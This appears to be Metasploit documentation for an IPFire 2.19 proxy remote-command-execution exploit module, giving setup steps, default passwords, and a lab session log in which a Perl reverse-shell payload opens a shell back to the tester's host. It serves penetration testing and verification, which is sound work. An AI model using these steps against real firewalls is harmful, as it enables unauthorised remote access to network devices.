## Vulnerable Application

  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
  4. Do: ```set password admin``` or whatever it was set to at install
  5. Do: ```set rhost 10.10.10.10```
  6. Do: ```set payload cmd/unix/reverse_perl```
  7. Do: ```set lhost 192.168.2.229```
  8. Do: ```exploit```
  9. You should get a shell.

## Options

  **PASSWORD**

  Password is set at install.  May be blank, 'admin', or 'ipfire'.

## Scenarios

  ```
    msf > use exploit/linux/http/ipfire_proxy_exec
    msf exploit(ipfire_proxy_rce) > set password admin
    password => admin
    msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
    rhost => 192.168.2.201
    msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
    payload => cmd/unix/reverse_perl
    msf exploit(ipfire_proxy_rce) > set verbose true
    verbose => true
    msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(ipfire_proxy_rce) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400

    id
    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
    whoami
    nobody
  ```